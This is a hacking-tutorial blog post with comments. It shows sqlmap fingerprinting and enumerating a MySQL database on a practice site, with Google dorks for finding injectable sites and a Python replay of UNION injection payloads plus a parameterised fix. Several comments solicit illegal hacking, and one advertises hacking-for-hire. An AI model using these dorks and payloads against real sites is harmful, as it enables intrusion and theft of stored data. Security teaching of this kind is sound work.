Welcome back, my amateur hackers!
In this tutorial, we will follow up on a previous tutorial on MySQL. In that tutorial, I showed you the basics of running a MySQL server on BackTrack. In addition, you might want to take a look at my tutorial on the basics of databases if you are not familiar with databases and database management systems (DBMS). Since MySQL is SO important in so many web applications, I will be doing more MySQL tutorials in the future. The more you know about MySQL, the better you can hack MySQL!
Generally, MySQL is teamed up with PHP and an Apache web server (the so-called LAMP stack; XAMPP is a popular packaged version of it) to build dynamic, database-driven web sites. Content management systems such as Drupal, Joomla and WordPress use MySQL as their default database, and many Ruby on Rails applications are deployed on it as well. Millions of websites have MySQL backends, and very often they are "homegrown" websites built without much attention to security.
In this tutorial, we will be looking to extract information about an online MySQL database before we actually extract information from the database. Once again, I'll repeat: the more we know, the more successful we will be in hacking, and the less chance there is that you will be detected.
Here, we will be using one of the best database hacking tools available, sqlmap. Sqlmap can be used against databases other than MySQL, such as Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites built with PHP, Apache and MySQL.
Step 1: Start Sqlmap
First, fire up BackTrack and go to BackTrack, then Information Gathering, then Database Analysis, then MySQL Analysis and finally sqlmap, as shown in the screenshot below.
Step 2: Find a Vulnerable Web Site
In order to get "inside" the web site and ultimately the database, we are looking for web sites whose URLs end in "php?id=XXX", where XXX represents some number: a page that passes a numeric parameter straight into a database query. Those who are familiar with Google hacks/dorks can do a search on Google by entering:
- inurl:index.php?id=
- inurl:gallery.php?id=
- inurl:post.php?id=
- inurl:article?id=
...among others.
This will bring up literally millions of web sites that match this pattern. Keep in mind that the URL pattern only makes a site a candidate; whether the id parameter is actually injectable is what sqlmap tests in the steps below. If you are creative and ambitious, you can also find numerous web sites that list vulnerable web sites. You might want to check these out.
For our purposes here, and to keep you out of the long reach of the law, we will be hacking a website designed for this purpose, www.webscantest.com. We can practice on this web site and refine our skills without worrying about breaking any laws and having to raise bail money for you.
Step 3: Open Sqlmap
When you click on sqlmap, you will be greeted by a screen like that below. Sqlmap is a powerful tool, written as a Python script (we will be doing a Python tutorial soon), that has a multitude of options. We will just be scratching the surface of its capabilities in this tutorial.
Step 4: Determine the DBMS Behind the Web Site
Before we begin hacking a web site, we need to gather information. We need to know WHAT we are hacking. As I have said many times before, most exploits are very specific to the OS, the application, services, ports, etc. Let's begin by finding out what the DBMS is behind this web site.
To start sqlmap on this task, we type:
- ./sqlmap.py -u "the entire URL of the vulnerable web page"
or, in this case:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4"
When we do so, sqlmap will return results like those below. Notice where I have highlighted that the web site back-end is using MySQL 5.0.
Step 5: Find the Databases
Now that we know the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can help us do that. We take the command we used above and append --dbs to it, like this:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs
When we run this command against www.webscantest.com, we get results like those below. Notice that I have highlighted the two available databases, information_schema and scanme. information_schema is included in every MySQL installation and holds metadata on all the objects in the MySQL instance (databases, tables, columns, privileges), but no application data of interest. Although it can be beneficial to explore that database to find objects in all the databases in the instance, we will focus our attention on the other database here, scanme, which may have some valuable information. Let's explore it further.
Step 6: Get More Info from the Database
So, now we know what the DBMS is (MySQL 5.0) and the name of a database of interest (scanme). The next step is to determine the tables and columns in that database. In this way, we will have some idea of what data is in the database, where it is and what type of data it is (numeric or string). All of this information is critical and necessary to extracting the data. To do this, we need to make some small revisions to our sqlmap command. Everything else we have used above remains the same, but now we tell sqlmap we want to see the tables and columns from the scanme database. We append --columns -D and the name of the database, scanme, like this:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs --columns -D scanme
When we do so, sqlmap will target the scanme database and attempt to enumerate the tables and columns in the scanme database.
As we can see below, sqlmap was able to enumerate three tables: (1) accounts, (2) inventory and (3) orders, complete with column names and data types. Not bad!
Note that the orders table below includes credit card numbers, expiration dates and CVV codes, the hacker's "Golden Fleece"! (Storing the CVV after a transaction has been authorized is prohibited by PCI DSS, so a table like this is a compliance failure as well as a security one.)
As you can see, sqlmap can be a very versatile and useful tool for MySQL, SQL Server and Oracle database hacking. We plan on coming back to sqlmap in the near future to explore more of its extensive database hacking capabilities.
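The whole chain in Steps 4 to 6 comes down to a handful of catalog queries that sqlmap smuggles through the injectable id parameter: a true/false tautology to confirm the hole, the engine version for the fingerprint, and the DBMS's own metadata tables for databases, tables and columns. The following Python script is added here as an illustration; it is not part of the original tutorial and not sqlmap's code. It replays that chain by hand against a constructed in-memory SQLite database with a made-up "scanme"-style schema (three empty-ish tables; nothing from webscantest.com is reproduced). Because SQLite has no information_schema, its sqlite_master catalog and pragma_table_info() stand in for MySQL's information_schema.tables and information_schema.columns, and sqlite_version() stands in for version(); the vulnerable_lookup() function is a hypothetical stand-in for the PHP page. The hardened lookup at the end shows the fix a developer would apply.

```python
"""Hand-rolled replay of the sqlmap enumeration chain from Steps 4-6.

Target: a constructed in-memory SQLite database that mimics the page's
"scanme" schema. SQLite's sqlite_master and pragma_table_info() stand in
for MySQL's information_schema.tables / information_schema.columns.
"""
import sqlite3

# Constructed sample schema: the three tables the tutorial enumerated, made-up rows.
SAMPLE_SCHEMA = """
CREATE TABLE accounts  (id INTEGER PRIMARY KEY, uname TEXT, passwd TEXT);
CREATE TABLE inventory (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE orders    (id INTEGER PRIMARY KEY, ccnum TEXT, expdate TEXT, cvv TEXT);
INSERT INTO inventory VALUES (4, 'widget', 9.99), (5, 'gadget', 19.99);
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SAMPLE_SCHEMA)
    return con


def vulnerable_lookup(con, item_id):
    """Hypothetical stand-in for search_get_by_id.php: the id is glued into the SQL."""
    sql = "SELECT name, price FROM inventory WHERE id=" + item_id
    return con.execute(sql).fetchall()


def boolean_probe(con, base_id="4"):
    """sqlmap's first check: a true and a false tautology must give different pages."""
    true_page = vulnerable_lookup(con, base_id + " AND 1=1")
    false_page = vulnerable_lookup(con, base_id + " AND 1=2")
    return true_page != false_page


def fingerprint(con, base_id="4"):
    """Step 4: read the engine version through the hole (MySQL: version() / @@version).
    'AND 1=2' blanks the legitimate row so only the UNION'd row comes back."""
    rows = vulnerable_lookup(con, base_id + " AND 1=2 UNION SELECT sqlite_version(), NULL")
    return rows[0][0] if rows else None


def enumerate_tables(con, base_id="4"):
    """Steps 5/6 (--tables): on MySQL sqlmap reads information_schema.tables."""
    rows = vulnerable_lookup(
        con, base_id + " AND 1=2 UNION SELECT name, sql FROM sqlite_master WHERE type='table'")
    return sorted(name for name, _ in rows)


def enumerate_columns(con, table, base_id="4"):
    """Step 6 (--columns): on MySQL sqlmap reads information_schema.columns.
    pragma_table_info() as a table-valued function needs SQLite >= 3.16."""
    rows = vulnerable_lookup(
        con, base_id + " AND 1=2 UNION SELECT name, type FROM pragma_table_info('%s')" % table)
    return sorted(rows)


def safe_lookup(con, item_id):
    """The fix: validate the type and bind the value; SQL text never comes from the user."""
    try:
        item = int(item_id)
    except ValueError:
        return []
    return con.execute("SELECT name, price FROM inventory WHERE id=?", (item,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("injectable:", boolean_probe(con))
    print("engine:", fingerprint(con))
    print("tables:", enumerate_tables(con))
    print("orders columns:", enumerate_columns(con, "orders"))
    print("hardened lookup with payload:", safe_lookup(con, "4 AND 1=1"))
```

Every payload here has the same shape sqlmap generates for a UNION-based injection: neutralise the real row, then append a SELECT with the same column count that pulls catalog data into the page. On a real MySQL target the only things that change are the catalog names (information_schema.schemata, .tables, .columns) and the version function; that is exactly the knowledge sqlmap packages behind --dbs, --tables and --columns.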
Keep coming back, my amateur hackers, for more adventures in Hackerland!
28 Comments
master:
If I only know the URL of the site, e.g. http://WWW.ABC.COM, how can I know if it contains "phpid="?
Hey SecretKing, try just browsing through the site and pay attention to the changes in the URL. Or go to a Google search and type 'inurl:abc.com phpid' and see if it shows up!
I used uniscan on BackTrack, selected the dynamic test; it's great.
Hope it helps.
"Using unescaped version of the test because of zero knowledge of the back-end DBMS" is returned... any ideas?
And how do I see the values entered in those columns?
Rohit:
Check out this tutorial .
OTW
Dear OTW, if I find a website's MySQL credentials (e.g. a WordPress or Joomla site), how can I log in to MySQL? victim.com/cpanel doesn't work.
You can find the admin panel using some admin panel finding tools...
BackTrack is no longer available on the site. What to do now? Is there any other way to use this method?
Wasi:
You can download BackTrack's successor, Kali, at www.kali-linux.com.
OTW
So you have shown us how to hack websites that are easy to hack (with easy inurl searching). But most websites are better protected now and sqlmap won't work with this tutorial. So could you show us how to "hack" "better protected" websites? I think I'm not the only guy who wants to know this.
Thanks a lot :)
I would like to know, as many others do, how to hack into an online server-based casino game to change the fake chips value, or how to get an old account back that was banned. The game I'm asking about is Bigfish Casino.
Hello, I enjoy reading your tutorials. I would like to ask you about this site www.webscanhost.org; it seems down. Do you recommend any other site to practice SQL injection skills?
It's www.webscantest.com
./sqlmap.py -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs
It is not showing any database on the site... what to do?
Vivek:
Check your syntax and try again. If it fails again, send a screenshot.
OTW
I challenge you to go talk to her..
So can you apply the same SQL injection to hacking and changing your online grades?
I could use some help recovering a client database. Will pay via PayPal. Any takers?
Nice tut.
Lord Marcus can go to hell, no one needs his help here.
Penetration and Invisible crawl-In ( SQL Sequence ) is what we specialise/Love doing.
However, Check closely with us on your School Grades Change
#ServerManipulation #Email/Social Media Penetration
#EMail Extraction #Independent Crawl-In #By-Pass Double Authentication
#PeopleTrace ( With Real Time Tracking ) #Website Design/Maintenance Etc.
Email us with Detailed disclosure About your project
Email :aceteam@cyberservices.com
phone:+1 347 868 2940
Please, how can I remotely alter a database through SQLi? Is it possible with sqlmap?
Kali gives easier steps.
Anybody can help me?
I can not give DB at one site.
I do all ways, please help me.
My Skype: alireza11021561
How to protect our website database from hacking?
Please, how do I get the sqlmap software?
How do I hack the database of an institution such as a university?